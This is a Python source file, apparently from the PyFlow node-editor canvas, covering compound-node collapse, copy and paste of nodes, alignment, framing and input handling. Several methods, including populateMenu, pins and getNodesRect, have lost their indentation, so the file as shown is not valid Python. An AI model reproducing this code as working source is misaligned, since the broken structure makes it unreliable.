            if wire.source().owningNode().isSelected() and not wire.destination().owningNode().isSelected():
                if wire.destination() not in outputPins:
                    outputPins.append(wire.destination())
                    outputConectionList[wire.destination()] = [[wire.source().owningNode().name, wire.source().name]]
                else:
                    outputConectionList[wire.destination()].append([wire.source().owningNode().name, wire.source().name])
            if not wire.source().owningNode().isSelected() and wire.destination().owningNode().isSelected():
                if wire.source() not in inputPins:
                    inputPins.append(wire.source())
                    inputConectionList[wire.source()] = [[wire.destination().owningNode().name, wire.destination().name]]
                else:
                    inputConectionList[wire.source()].append([wire.destination().owningNode().name, wire.destination().name])
        # Serialize the selection, then remove the originals.
        nodes = self.copyNodes(toClipBoard=False)
        for node in selectedNodes:
            node._rawNode.kill()
        # Create the compound node at the center of the old selection.
        compoundTemplate = NodeBase.jsonTemplate()
        compoundTemplate['package'] = 'PyFlowBase'
        compoundTemplate['type'] = 'compound'
        compoundTemplate['name'] = 'compound'
        compoundTemplate['uuid'] = str(uuid.uuid4())
        compoundTemplate['meta']['label'] = 'compound'
        compoundTemplate['x'] = selectedNodesRect.center().x()
        compoundTemplate['y'] = selectedNodesRect.center().y()
        uiCompoundNode = self._createNode(compoundTemplate)
        activeGraphName = self.graphManager.activeGraph().name
        # Enter the compound's subgraph and paste the copied nodes there.
        uiCompoundNode.stepIn()
        self.pasteNodes(data=nodes, move=False)
        newInputPins = dict()
        newOutputPins = dict()
        if len(inputPins) > 0:
            # graphInputs node feeds the pasted nodes from outside.
            graphInputsTemplate = NodeBase.jsonTemplate()
            graphInputsTemplate['package'] = 'PyFlowBase'
            graphInputsTemplate['type'] = 'graphInputs'
            graphInputsTemplate['name'] = 'graphInputs'
            graphInputsTemplate['uuid'] = str(uuid.uuid4())
            graphInputsTemplate['meta']['label'] = 'graphInputs'
            graphInputsTemplate['x'] = selectedNodesRect.left() - 100
            graphInputsTemplate['y'] = selectedNodesRect.center().y()
            graphInputs = self._createNode(graphInputsTemplate)
            for o in inputPins:
                newPinName = self.graphManager.getUniqName(o.owningNode().name)
                newPin = graphInputs.onAddOutPin(newPinName, o.dataType)
                newInputPins[o] = newPin
                for n in inputConectionList[o]:
                    node = self.findNode(n[0])
                    self.connectPinsInternal(newPin, node.getPinSG(n[1]))
        if len(outputPins) > 0:
            # graphOutputs node exposes results of the pasted nodes.
            graphOutputsTemplate = NodeBase.jsonTemplate()
            graphOutputsTemplate['package'] = 'PyFlowBase'
            graphOutputsTemplate['type'] = 'graphOutputs'
            graphOutputsTemplate['name'] = 'graphOutputs'
            graphOutputsTemplate['uuid'] = str(uuid.uuid4())
            graphOutputsTemplate['meta']['label'] = 'graphOutputs'
            graphOutputsTemplate['x'] = selectedNodesRect.right() + 100
            graphOutputsTemplate['y'] = selectedNodesRect.center().y()
            graphOutputs = self._createNode(graphOutputsTemplate)
            for i in outputPins:
                newPinName = self.graphManager.getUniqName(i.owningNode().name)
                newPin = graphOutputs.onAddInPin(newPinName, i.dataType)
                newOutputPins[i] = newPin
                for n in outputConectionList[i]:
                    node = self.findNode(n[0])
                    self.connectPinsInternal(newPin, node.getPinSG(n[1]))
        def connectPins(compoundNode, inputs, outputs):
            # Reconnect the compound's exposed pins to the old outside pins.
            for o in inputs:
                exposedPin = compoundNode.getPinSG(newInputPins[o].name)
                if exposedPin:
                    self.connectPinsInternal(exposedPin, o)
            for i in outputs:
                exposedPin = compoundNode.getPinSG(newOutputPins[i].name)
                if exposedPin:
                    self.connectPinsInternal(i, exposedPin)
            EditorHistory().saveState("Collapse to compound", modify=True)
        # Deferred: exposed pins appear on the compound only after the
        # subgraph contents are in place — presumably needs an event-loop
        # round trip; confirm before removing the timer.
        QtCore.QTimer.singleShot(1, lambda: connectPins(uiCompoundNode, inputPins, outputPins))
        self.graphManager.selectGraphByName(activeGraphName)
def populateMenu(self):
self.actionCollapseSelectedNodes = self.menu.addAction("Collapse selected nodes")
self.actionCollapseSelectedNodes.triggered.connect(lambda: self.setSelectedNodesCollapsed(True))
self.menu.addAction(self.actionCollapseSelectedNodes)
self.actionExpandSelectedNodes = self.menu.addAction("Expand selected nodes")
self.actionExpandSelectedNodes.triggered.connect(lambda: self.setSelectedNodesCollapsed(False))
self.menu.addAction(self.actionExpandSelectedNodes)
self.actionCollapseSelectedNodesToCompound = self.menu.addAction("Collapse to compound")
self.actionCollapseSelectedNodesToCompound.triggered.connect(self.collapseSelectedNodesToCompound)
self.menu.addAction(self.actionCollapseSelectedNodesToCompound)
    def plot(self):
        # Delegate graph dump/printing to the graph manager.
        self.graphManager.plot()
    def location(self):
        # Current graph location path, as reported by the graph manager.
        return self.graphManager.location()
    def __del__(self):
        # Intentionally empty; the old timer stop is kept for reference.
        # self.tick_timer.stop()
        pass
    def createVariable(self, dataType='AnyPin', accessLevel=AccessLevel.public, uid=None):
        # Convenience wrapper: variables are always created on the active graph.
        return self.graphManager.activeGraph().createVariable(dataType=dataType, accessLevel=accessLevel, uid=uid)
    @property
    def nodes(self):
        """returns all ui nodes dict including compounds
        """
        result = {}
        for rawNode in self.graphManager.getAllNodes():
            uiNode = rawNode.getWrapper()
            # NOTE(review): a wrapperless node is only reported here; its
            # (None) value is still inserted into the result below.
            if uiNode is None:
                print("{0} has not UI wrapper".format(rawNode.name))
            # Duplicate uids get a fresh uuid4 so the dict keeps every node.
            if rawNode.uid in result:
                rawNode.uid = uuid.uuid4()
            result[rawNode.uid] = uiNode
        return result
@property
def pins(self):
"""Returns UI pins dict {uuid: UIPinBase}
"""
result = {}
for node in self.graphManager.getAllNodes():
for pin in node.pins:
result[pin.uid] = pin.getWrapper()()
return result
    @property
    def connections(self):
        # Live map {uuid: UIConnection} of wires drawn on this canvas.
        return self._UIConnections
    def getAllNodes(self):
        """returns all ui nodes list
        """
        # Snapshot list; mutating it does not affect the canvas.
        return list(self.nodes.values())
    def showNodeBox(self, pinDirection=None, pinStructure=PinStructure.Single):
        """Pop the node-search box at the cursor, filtered by pin
        direction/structure compatibility."""
        self.node_box.show()
        self.node_box.move(QtGui.QCursor.pos())
        self.node_box.treeWidget.refresh('', pinDirection, pinStructure)
        # Clear the search field without re-triggering its filter signal.
        self.node_box.lineEdit.blockSignals(True)
        self.node_box.lineEdit.setText("")
        self.node_box.lineEdit.blockSignals(False)
        self.node_box.lineEdit.setFocus()
    def hideNodeBox(self):
        # Hide the search popup and reset its query field.
        self.node_box.hide()
        self.node_box.lineEdit.clear()
    def shoutDown(self, *args, **kwargs):
        """Tear down canvas state: delete code editors, clear the scene,
        drop wire records, hide the node box and shut down every UI node.
        Extra args are accepted for signal-slot compatibility."""
        for ed in self.codeEditors.values():
            ed.deleteLater()
        self.scene().clear()
        self._UIConnections.clear()
        self.hideNodeBox()
        for node in self.nodes.values():
            node.shoutDown()
    def mouseDoubleClickEvent(self, event):
        # Forward to Qt first, then notify the OnDoubleClick hook with the
        # click position mapped to scene coordinates.
        QGraphicsView.mouseDoubleClickEvent(self, event)
        self.OnDoubleClick(self.mapToScene(event.pos()))
        event.accept()
    def OnDoubleClick(self, pos):
        # Hook for subclasses; *pos* is in scene coordinates.
        pass
    def Tick(self, deltaTime):
        # Periodic update (presumably called once per frame by the owning
        # app): apply auto-pan while it is active and let each wire refresh.
        if self.autoPanController.isActive():
            delta = self.autoPanController.getDelta() * -1
            self.pan(delta)
        # list() guards against the dict changing while wires tick.
        for e in list(self.connections.values()):
            e.Tick()
    def isShortcutsEnabled(self):
        # Whether canvas keyboard shortcuts are active
        # (see disableSortcuts/enableSortcuts).
        return self._sortcuts_enabled
    def disableSortcuts(self):
        # NOTE: the historical misspelling ("Sortcuts") is kept — renaming
        # would break existing callers.
        self._sortcuts_enabled = False
    def enableSortcuts(self):
        # Counterpart of disableSortcuts (misspelling kept for API compat).
        self._sortcuts_enabled = True
    def onNewFile(self, keepRoot=True):
        # *keepRoot* is accepted for signature compatibility but unused here.
        self.getApp().undoStack.clear()
        self.shoutDown()
def getPinByFullName(self, full_name):
node_name = full_name.split('.')[0]
pinName = full_name.split('.')[1]
node = self.findNode(node_name)
if node:
Pin = node.getPinSG(pinName)
if Pin:
return Pin
    def frameRect(self, nodesRect):
        """Pan and zoom so *nodesRect* (scene space) fills the view.

        :param nodesRect: rect to frame; None is a no-op.
        :returns: the zoom scale applied, or None when nodesRect is None.
        """
        if nodesRect is None:
            return
        windowRect = self.mapToScene(self.rect()).boundingRect()
        # pan to center of window
        delta = windowRect.center() - nodesRect.center()
        delta *= self.currentViewScale()
        self.pan(delta)
        # zoom to fit content
        ws = windowRect.size()
        # Padding so framed nodes don't touch the viewport edges.
        nodesRect += QtCore.QMargins(0, 20, 150, 20)
        rs = nodesRect.size()  # NOTE(review): rs is unused.
        widthRef = ws.width()
        heightRef = ws.height()
        sx = widthRef / nodesRect.width()
        sy = heightRef / nodesRect.height()
        # Use the smaller scale so both dimensions fit.
        scale = sx if sy > sx else sy
        self.zoom(scale)
        return scale
def ensureNodesRectAlmostEqualWindowRect(self, tolerance=10.0):
windowRect = self.mapToScene(self.rect()).boundingRect()
nodesRect = self.getNodesRect()
errorPoint = windowRect.topLeft() - nodesRect.topLeft()
error = abs(errorPoint.x() + errorPoint.y())
return error < tolerance
    def frameSelectedNodes(self):
        # frameRect is deliberately called twice — presumably the first pass
        # changes the zoom, which shifts the mapping used to settle the
        # final framing (frameAllNodes does the same with an error check).
        self.frameRect(self.getNodesRect(True))
        self.frameRect(self.getNodesRect(True))
    def frameAllNodes(self):
        """Zoom/pan so every node of the active graph is visible."""
        rect = self.getNodesRect()
        if rect is not None:
            self.frameRect(rect)
            # A single pass can leave a small offset because framing changes
            # the zoom; re-frame once if the result is not close enough.
            if not self.ensureNodesRectAlmostEqualWindowRect():
                self.frameRect(self.getNodesRect())
def getNodesRect(self, selected=False, activeGraphOnly=True):
rectangles = []
if selected:
for n in [n for n in self.getAllNodes() if n.isSelected()]:
if activeGraphOnly:
if n._rawNode.graph() != self.graphManager.activeGraph():
continue
n_rect = QtCore.QRectF(n.scenePos(), QtCore.QPointF(n.scenePos().x() + float(n.w), n.scenePos().y() + float(n.h)))
rectangles.append([n_rect.x(), n_rect.y(), n_rect.bottomRight().x(), n_rect.bottomRight().y()])
else:
for n in self.getAllNodes():
if activeGraphOnly:
if n._rawNode.graph() != self.graphManager.activeGraph():
continue
n_rect = QtCore.QRectF(n.scenePos(), QtCore.QPointF(n.scenePos().x() + float(n.w), n.scenePos().y() + float(n.h)))
rectangles.append([n_rect.x(), n_rect.y(), n_rect.bottomRight().x(), n_rect.bottomRight().y()])
arr1 = [i[0] for i in rectangles]
arr2 = [i[2] for i in rectangles]
arr3 = [i[1] for i in rectangles]
arr4 = [i[3] for i in rectangles]
if any([len(arr1) == 0, len(arr2) == 0, len(arr3) == 0, len(arr4) == 0]):
return None
min_x = min(arr1)
max_x = max(arr2)
min_y = min(arr3)
max_y = max(arr4)
return QtCore.QRect(QtCore.QPoint(min_x, min_y), QtCore.QPoint(max_x, max_y))
def selectedNodes(self):
allNodes = self.getAllNodes()
assert(None not in allNodes), "Bad nodes!"
return [i for i in allNodes if i.isSelected()]
    def selectedConnections(self):
        # All wires currently selected on the canvas.
        return [i for i in self.connections.values() if i.isSelected()]
def clearSelection(self):
for node in self.selectedNodes():
node.setSelected(False)
for connection in self.selectedConnections():
connection.setSelected(False)
    def killSelectedConnections(self):
        # Delegates removal to removeEdgeCmd (presumably the command path
        # that keeps the edit undoable — confirm).
        self.removeEdgeCmd(self.selectedConnections())
def killSelectedNodes(self):
selectedNodes = self.selectedNodes()
if self.isShortcutsEnabled() and len(selectedNodes) > 0:
for node in selectedNodes:
node._rawNode.kill()
self.requestClearProperties.emit()
def keyPressEvent(self, event):
        """Dispatch canvas keyboard shortcuts.

        Handles comment-node creation on plain 'C', and all shortcuts registered
        with InputManager (align, undo/redo, frame, zoom, kill, copy/cut/paste,
        duplicate). Always forwards the event to QGraphicsView afterwards.
        """
        modifiers = event.modifiers()
        # wrap the raw key press so it can be compared against configured shortcuts
        currentInputAction = InputAction("temp", InputActionType.Keyboard, "temp", key=event.key(), modifiers=modifiers)
        # remembered so mousePressEvent can implement key+click combos (e.g. B + LMB)
        self.currentPressedKey = event.key()
        if self.isShortcutsEnabled():
            if all([event.key() == QtCore.Qt.Key_C, modifiers == QtCore.Qt.NoModifier]):
                # create comment node
                rect = self.getNodesRect(True)
                if rect:
                    # pad the selection's bounding rect so the comment encloses it
                    rect.setTop(rect.top() - 30)
                    rect.setLeft(rect.left() - 30)
                    rect.setRight(rect.right() + 100)
                    rect.setBottom(rect.bottom() + 30)
                nodeTemplate = NodeBase.jsonTemplate()
                nodeTemplate['package'] = "PyFlowBase"
                nodeTemplate['type'] = commentNode.__name__
                nodeTemplate['name'] = commentNode.__name__
                if rect:
                    # wrap the selected nodes
                    nodeTemplate['x'] = rect.topLeft().x()
                    nodeTemplate['y'] = rect.topLeft().y()
                else:
                    # nothing selected: spawn at the cursor
                    nodeTemplate['x'] = self.mapToScene(self.mousePos).x()
                    nodeTemplate['y'] = self.mapToScene(self.mousePos).y()
                nodeTemplate['meta']['label'] = commentNode.__name__
                nodeTemplate['uuid'] = str(uuid.uuid4())
                instance = self.createNode(nodeTemplate)
                if rect:
                    instance._rect.setRight(rect.width())
                    instance._rect.setBottom(rect.height())
                    instance.updateNodeShape()
                # selected nodes now report the new comment as their owner
                for node in self.selectedNodes():
                    node.updateOwningCommentNode()
            if currentInputAction in InputManager()["Canvas.AlignLeft"]:
                self.alignSelectedNodes(Direction.Left)
                return
            if currentInputAction in InputManager()["Canvas.AlignTop"]:
                self.alignSelectedNodes(Direction.Up)
                return
            if currentInputAction in InputManager()["Canvas.AlignRight"]:
                self.alignSelectedNodes(Direction.Right)
                return
            if currentInputAction in InputManager()["Canvas.AlignBottom"]:
                self.alignSelectedNodes(Direction.Down)
                return
            if currentInputAction in InputManager()["Canvas.Undo"]:
                self.getApp().edHistory.undo()
            if currentInputAction in InputManager()["Canvas.Redo"]:
                self.getApp().edHistory.redo()
            if currentInputAction in InputManager()["Canvas.FrameSelected"]:
                self.frameSelectedNodes()
            if currentInputAction in InputManager()["Canvas.FrameAll"]:
                self.frameAllNodes()
            if currentInputAction in InputManager()["Canvas.ZoomIn"]:
                self.zoomDelta(True)
            if currentInputAction in InputManager()["Canvas.ZoomOut"]:
                self.zoomDelta(False)
            if currentInputAction in InputManager()["Canvas.ResetScale"]:
                self.reset_scale()
            if currentInputAction in InputManager()["Canvas.KillSelected"]:
                self.killSelectedNodes()
                self.killSelectedConnections()
                EditorHistory().saveState("Kill selected", modify=True)
            if currentInputAction in InputManager()["Canvas.CopyNodes"]:
                self.copyNodes()
            if currentInputAction in InputManager()["Canvas.CutNodes"]:
                self.cutNodes()
            if currentInputAction in InputManager()["Canvas.DuplicateNodes"]:
                self.duplicateNodes()
            if currentInputAction in InputManager()["Canvas.PasteNodes"]:
                self.pasteNodes()
                EditorHistory().saveState("Paste nodes", modify=True)
        QGraphicsView.keyPressEvent(self, event)
def duplicateNodes(self):
        """Copy the selected nodes and paste them immediately, recording an undo step."""
        serialized = self.copyNodes()
        self.pasteNodes(data=serialized)
        EditorHistory().saveState("Duplicate nodes", modify=True)
def makeSerializedNodesUnique(self, nodes, extra=None):
        """Return a deep copy of serialized *nodes* with fresh unique names and uuids.

        Node names are made unique against all names known to the graph manager
        (plus *extra*), pin full names and uuids are regenerated, link data is
        retargeted to the renamed nodes, and compound sub-graphs are processed
        recursively.

        :param nodes: list of serialized node dicts
        :param extra: extra names to treat as taken (default: none). The previous
                      signature used a mutable default ``extra=[]``; ``None``
                      avoids the shared-default pitfall and is backward compatible.
        """
        if extra is None:
            extra = []
        copiedNodes = deepcopy(nodes)
        # make names unique
        renameData = {}
        existingNames = self.graphManager.getAllNames() + extra
        for node in copiedNodes:
            newName = getUniqNameFromList(existingNames, node['name'])
            existingNames.append(newName)
            renameData[node['name']] = newName
            # rename old name in header data
            node["wrapper"]["headerHtml"] = node["wrapper"]["headerHtml"].replace(node['name'], newName)
            node['name'] = newName
            node['uuid'] = str(uuid.uuid4())
            for inp in node['inputs']:
                inp['fullName'] = '{0}_{1}'.format(node['name'], inp['name'])
                inp['uuid'] = str(uuid.uuid4())
            for out in node['outputs']:
                out['fullName'] = '{0}_{1}'.format(node['name'], out['name'])
                out['uuid'] = str(uuid.uuid4())
        # update connections to reference the renamed nodes
        # (inputs and outputs share identical link-rewrite logic)
        for node in copiedNodes:
            for pins in (node['outputs'], node['inputs']):
                for pin in pins:
                    for linkedToData in pin['linkedTo']:
                        lhsNodeName = linkedToData["lhsNodeName"]
                        rhsNodeName = linkedToData["rhsNodeName"]
                        if lhsNodeName in renameData:
                            linkedToData["lhsNodeName"] = renameData[lhsNodeName]
                        if rhsNodeName in renameData:
                            linkedToData["rhsNodeName"] = renameData[rhsNodeName]
        # recurse into compound sub-graphs
        for node in copiedNodes:
            if node['type'] == 'compound':
                node['graphData']['nodes'] = self.makeSerializedNodesUnique(node['graphData']['nodes'], extra=existingNames)
        return copiedNodes
def cutNodes(self):
        """Cut: copy the selected nodes to the clipboard, then delete them."""
        self.copyNodes()
        self.killSelectedNodes()
def copyNodes(self, toClipBoard=True):
        """Serialize the selected nodes to a json string.

        Collapsed comment nodes implicitly contribute the hidden nodes they own.
        Output links are stripped; exec input links pointing at nodes outside
        the copied set are dropped. Returns the json string, or None if nothing
        is selected.

        :param toClipBoard: when True, also place the json on the application clipboard
        """
        nodes = []
        selectedNodes = [i for i in self.nodes.values() if i.isSelected()]
        # extending while iterating is deliberate here: nodes owned by collapsed
        # comments (and their own collapsed comments) are pulled in transitively
        for node in selectedNodes:
            if node.isCommentNode and node.collapsed:
                selectedNodes.extend(node.owningNodes)
        if len(selectedNodes) == 0:
            return
        for n in selectedNodes:
            nodes.append(n.serialize())
        serializedNodeNames = [i["name"] for i in nodes]
        for nodeJson in nodes:
            for outJson in nodeJson["outputs"]:
                outJson["linkedTo"] = []
            for inpJson in nodeJson["inputs"]:
                # BUGFIX: the old code removed links from the list while
                # iterating it, silently skipping every other matching entry.
                # Rebuild the list instead.
                if inpJson["dataType"] == "ExecPin":
                    inpJson["linkedTo"] = [link for link in inpJson["linkedTo"]
                                           if link["lhsNodeName"] in serializedNodeNames]
        if len(nodes) > 0:
            copyJsonStr = json.dumps(nodes)
            if toClipBoard:
                QApplication.clipboard().clear()
                QApplication.clipboard().setText(copyJsonStr)
            return copyJsonStr
def pasteNodes(self, move=True, data=None):
        """Deserialize nodes from *data* (or the clipboard) and add them to the canvas.

        Names/uuids are regenerated, pasted nodes are selected, connections
        between pasted nodes are restored, and comment ownership is recomputed.

        :param move: when True, offset pasted nodes so the first lands at the cursor
        :param data: json string of serialized nodes; clipboard text when falsy
        """
        if not data:
            try:
                nodes = json.loads(QApplication.clipboard().text())
            except json.JSONDecodeError:
                # clipboard does not hold a node payload
                return
        else:
            nodes = json.loads(data)
        if not nodes:
            # nothing to paste; also guards the nodes[0] access below (the old
            # code raised IndexError on an empty payload)
            return
        existingNames = self.graphManager.getAllNames()
        nodes = self.makeSerializedNodesUnique(nodes, extra=existingNames)
        # offset from the first node's stored position to the current mouse position
        diff = QtCore.QPointF(self.mapToScene(self.mousePos)) - QtCore.QPointF(nodes[0]["x"], nodes[0]["y"])
        self.clearSelection()
        nodesData = deepcopy(nodes)
        createdNodes = {}
        for node in nodesData:
            n = self._createNode(node)
            if n is None:
                continue
            createdNodes[n] = node
            n.setSelected(True)
            if move:
                n.setPos(n.scenePos() + diff)
        # restore connections between the pasted nodes
        for nodeJson in nodesData:
            for inpPinJson in nodeJson['inputs']:
                for linkData in inpPinJson['linkedTo']:
                    try:
                        lhsNode = self.findNode(linkData["lhsNodeName"])
                        lhsPin = lhsNode.orderedOutputs[linkData["outPinId"]]
                        rhsNode = self.findNode(nodeJson["name"])
                        rhsPin = rhsNode.orderedInputs[linkData["inPinId"]]
                        connected = connectPins(lhsPin, rhsPin)
                        if connected:
                            self.createUIConnectionForConnectedPins(lhsPin.getWrapper()(), rhsPin.getWrapper()())
                    except Exception:
                        # best-effort: the link's counterpart was not pasted
                        print(inpPinJson['fullName'], "not found")
                        continue
        # Hacks here!!
        # All nodes are copied. Nodes now do not know about under which comments they are
        # Expand all copied comments first
        for newNode, nodeData in createdNodes.items():
            if newNode.isCommentNode:
                newNode.collapsed = False
        # Non comment nodes now can update owning comments
        for newNode, nodeData in createdNodes.items():
            newNode.updateOwningCommentNode()
        # Restore comments collapsed state
        for newNode, nodeData in createdNodes.items():
            if newNode.isCommentNode:
                newNode.collapsed = nodeData["wrapper"]["collapsed"]
def findNode(self, name):
        """Return the UI node with the given name, or None if it does not exist."""
        return next((n for n in self.nodes.values() if n.name == name), None)
def alignSelectedNodes(self, direction):
        """Align the selected nodes along one edge and record an undo step.

        Left/Right snap every node's x to the min/max selected x; Up/Down snap
        y to the min/max selected y. No-op (and no history entry) when nothing
        is selected. The four near-identical per-direction branches of the old
        code are collapsed into one axis-parameterized path.
        """
        selected = [n for n in self.getAllNodes() if n.isSelected()]
        if len(selected) == 0:
            return
        if direction in (Direction.Left, Direction.Right):
            xs = [n.scenePos().x() for n in selected]
            target = min(xs) if direction == Direction.Left else max(xs)
            for n in selected:
                p = n.scenePos()
                p.setX(target)
                n.setPos(p)
        elif direction in (Direction.Up, Direction.Down):
            ys = [n.scenePos().y() for n in selected]
            target = min(ys) if direction == Direction.Up else max(ys)
            for n in selected:
                p = n.scenePos()
                p.setY(target)
                n.setPos(p)
        EditorHistory().saveState("Align nodes", modify=True)
def findGoodPlaceForNewNode(self):
        """Pick a semi-random spawn point in the lower half of the visible area."""
        viewPoly = self.mapToScene(self.viewport().rect())
        corners = viewPoly.toList()
        # midpoint of the visible polygon, anchored at its first corner
        spawn = QtCore.QPointF(
            (corners[1].x() - corners[0].x()) / 2, (corners[3].y() - corners[2].y()) / 2)
        spawn += corners[0]
        spawn.setY(spawn.y() + viewPoly.boundingRect().height() / 3)
        # random jitter so consecutive spawns do not stack exactly
        spawn += QtCore.QPointF(float(random.randint(50, 200)),
                                float(random.randint(50, 200)))
        return spawn
def keyReleaseEvent(self, event):
        """Forward the release to the base view, then forget the last pressed key
        (used by key+click combos in mousePressEvent)."""
        QGraphicsView.keyReleaseEvent(self, event)
        self.currentPressedKey = None
def nodeFromInstance(self, instance):
        """Walk up the graphics-item parent chain from *instance* and return the
        owning UINodeBase, or None if *instance* is not part of a node."""
        if isinstance(instance, UINodeBase):
            return instance
        item = instance
        while isinstance(item, (QGraphicsItem, QGraphicsWidget, QGraphicsProxyWidget)) and item.parentItem():
            item = item.parentItem()
        return item if isinstance(item, UINodeBase) else None
def getReruteNode(self, pos, connection=None):
        """Spawn a reroute node at viewport position *pos* and return its wrapper.

        An exec-flavored reroute is created when both ends of *connection* are
        exec pins, or — failing that — when the currently pressed pin is exec.
        """
        wantExecReroute = False
        if connection and connection.drawSource._rawPin.isExec() and connection.drawDestination._rawPin.isExec():
            wantExecReroute = True
        elif self.pressedPin and self.pressedPin.isExec():
            wantExecReroute = True
        nodeClassName = "rerouteExecs" if wantExecReroute else "reroute"
        scenePoint = self.mapToScene(pos)
        nodeTemplate = NodeBase.jsonTemplate()
        nodeTemplate['package'] = "PyFlowBase"
        nodeTemplate['lib'] = None
        nodeTemplate['type'] = nodeClassName
        nodeTemplate['name'] = "reroute"
        nodeTemplate['x'] = scenePoint.x()
        nodeTemplate['y'] = scenePoint.y()
        nodeTemplate['uuid'] = str(uuid.uuid4())
        nodeTemplate['meta']['label'] = "reroute"
        reruteNode = self.createNode(nodeTemplate)
        # center the tiny reroute shape on the requested point
        reruteNode.translate(-reruteNode.boundingRect().center().x(), -5)
        return reruteNode
def getInputNode(self):
        """Spawn a 'graphInputs' node near the left edge of the canvas and return it."""
        template = NodeBase.jsonTemplate()
        template['package'] = "PyFlowBase"
        template['lib'] = None
        template['type'] = "graphInputs"
        template['name'] = "graphInputs"
        # left border, slightly below vertical center
        template['x'] = self.boundingRect.left() + 50
        template['y'] = self.boundingRect.center().y() + 50
        template['uuid'] = str(uuid.uuid4())
        template['meta']['label'] = "Inputs"
        uiNode = self.createNode(template)
        uiNode.translate(-20, 0)
        return uiNode
def getOutputNode(self):
        """Spawn a 'graphOutputs' node near the right edge of the canvas and return it."""
        template = NodeBase.jsonTemplate()
        template['package'] = "PyFlowBase"
        template['lib'] = None
        template['type'] = "graphOutputs"
        template['name'] = "graphOutputs"
        # right border, slightly below vertical center
        template['x'] = self.boundingRect.width() - 50
        template['y'] = self.boundingRect.center().y() + 50
        template['uuid'] = str(uuid.uuid4())
        template['meta']['label'] = "Outputs"
        uiNode = self.createNode(template)
        uiNode.translate(-20, 0)
        return uiNode
def validateConnections(self, graph):
        """Hides show if needed. Changes endpoints positions if needed

        For every UI connection in *graph*: when an endpoint's node is hidden
        inside a collapsed comment, the wire endpoint is redirected to that
        comment's edge; wires fully inside a collapsed comment, or touching a
        node outside the active graph, are hidden.
        """
        checked = set()  # each wire can be reached from both of its pins — visit once
        for node in graph.getNodesList():
            uiNode = node.getWrapper()
            for pin in uiNode.UIPins.values():
                for connection in pin.uiConnectionList:
                    if connection in checked:
                        continue
                    # override src endpoint to comment left side if connected
                    # node is hidden and under collapsed comment
                    srcNode = connection.source().owningNode()
                    if srcNode.isUnderActiveGraph():
                        comment = srcNode.owningCommentNode
                        if comment is not None and comment.collapsed and not srcNode.isVisible():
                            connection.sourcePositionOverride = comment.getRightSideEdgesPoint
                    # override dst endpoint to comment right side if connected
                    # node is hidden and under collapsed comment
                    dstNode = connection.destination().owningNode()
                    if dstNode.isUnderActiveGraph():
                        comment = dstNode.owningCommentNode
                        if comment is not None and comment.collapsed and not dstNode.isVisible():
                            connection.destinationPositionOverride = comment.getLeftSideEdgesPoint
                    if connection.isUnderCollapsedComment():
                        connection.hide()
                    if not connection.source().owningNode().isUnderActiveGraph() or not connection.destination().owningNode().isUnderActiveGraph():
                        connection.hide()
                    checked.add(connection)
def validateCommentNodesOwnership(self, graph, bExpandComments=True):
        """Recompute which nodes are owned by which comment nodes.

        Comment nodes are (optionally) expanded first so the nodes they hide get
        valid positions, ownership is recomputed for comments and plain nodes,
        then each comment's original collapsed state is restored. The canvas
        state is switched to COMMENT_OWNERSHIP_VALIDATION for the duration.

        :param graph: graph whose nodes are validated
        :param bExpandComments: when True, temporarily expand collapsed comments
        """
        state = self.state
        self.state = CanvasState.COMMENT_OWNERSHIP_VALIDATION
        comments = {}
        defaultNodes = set()
        # expand all comment nodes and reset owning nodes info
        for node in graph.getNodesList():
            uiNode = node.getWrapper()
            if uiNode.isUnderActiveGraph():
                if uiNode.isCommentNode:
                    comments[uiNode] = uiNode.collapsed
                    # BUGFIX: this previously read `if not uiNode.collapsed`,
                    # which made the assignment a no-op — collapsed comments
                    # were never actually expanded before ownership was computed
                    if uiNode.collapsed:
                        if bExpandComments:
                            uiNode.collapsed = False
                    uiNode.owningNodes.clear()
                else:
                    defaultNodes.add(uiNode)
        # apply comment to comment membership
        for commentNode in comments:
            commentNode.updateOwningCommentNode()
        # apply node to comment membership
        for node in defaultNodes:
            node.updateOwningCommentNode()
        # restore comments collapse state
        for comment, wasCollapsed in comments.items():
            comment.collapsed = wasCollapsed
        self.state = state
def mousePressEvent(self, event):
        """Route a mouse press to the right canvas interaction.

        Depending on what is under the cursor and the held modifiers this starts:
        rectangle selection, panning, zooming, realtime wire drawing from a pin,
        wire reconnection (Ctrl+LMB on pin / LMB near a wire end), node move or
        drag-copy, comment resize, reroute insertion (Alt on a wire), or a
        branch spawn (B + LMB).
        """
        self.pressed_item = self.itemAt(event.pos())
        node = self.nodeFromInstance(self.pressed_item)
        self.pressedPin = self.findPinNearPosition(event.pos())
        modifiers = event.modifiers()
        self.mousePressPose = event.pos()
        # do not expand comments here — just refresh ownership
        expandComments = False
        self.validateCommentNodesOwnership(self.graphManager.activeGraph(), expandComments)
        # NOTE(review): positional args here differ from keyPressEvent's InputAction
        # call ("temp", "temp", type vs "temp", type, "temp") — confirm against
        # the InputAction signature
        currentInputAction = InputAction("temp", "temp", InputActionType.Mouse, event.button(), modifiers=modifiers)
        # "empty space" cases: nothing pressed, a wire (non-Alt), an expanded
        # comment body, or a resize handle of a resizable node
        if any([not self.pressed_item,
                isinstance(self.pressed_item, UIConnection) and modifiers != QtCore.Qt.AltModifier,
                isinstance(self.pressed_item, UINodeBase) and node.isCommentNode and not node.collapsed,
                isinstance(node, UINodeBase) and (node.resizable and node.shouldResize(self.mapToScene(event.pos()))["resize"])]):
            self.resizing = False
            # Create branch on B + LMB
            if self.currentPressedKey is not None and event.button() == QtCore.Qt.LeftButton:
                if self.currentPressedKey == QtCore.Qt.Key_B:
                    spawnPos = self.mapToScene(self.mousePressPose)
                    self.spawnNode("branch", spawnPos.x(), spawnPos.y())
            if isinstance(node, UINodeBase) and (node.isCommentNode or node.resizable):
                super(Canvas, self).mousePressEvent(event)
                self.resizing = node.bResize
                node.setSelected(False)
            if not self.resizing:
                if isinstance(self.pressed_item, UIConnection) and modifiers == QtCore.Qt.NoModifier and event.button() == QtCore.Qt.LeftButton:
                    # grab an existing wire end near the cursor to reconnect it
                    closestPin = self.findPinNearPosition(event.pos(), 20)
                    if closestPin is not None:
                        if closestPin.direction == PinDirection.Input:
                            self.pressed_item.destinationPositionOverride = lambda: self.mapToScene(self.mousePos)
                        elif closestPin.direction == PinDirection.Output:
                            self.pressed_item.sourcePositionOverride = lambda: self.mapToScene(self.mousePos)
                        self.reconnectingWires.add(self.pressed_item)
                elif event.button() == QtCore.Qt.LeftButton and modifiers in [QtCore.Qt.NoModifier, QtCore.Qt.ShiftModifier, QtCore.Qt.ControlModifier, QtCore.Qt.ControlModifier | QtCore.Qt.ShiftModifier]:
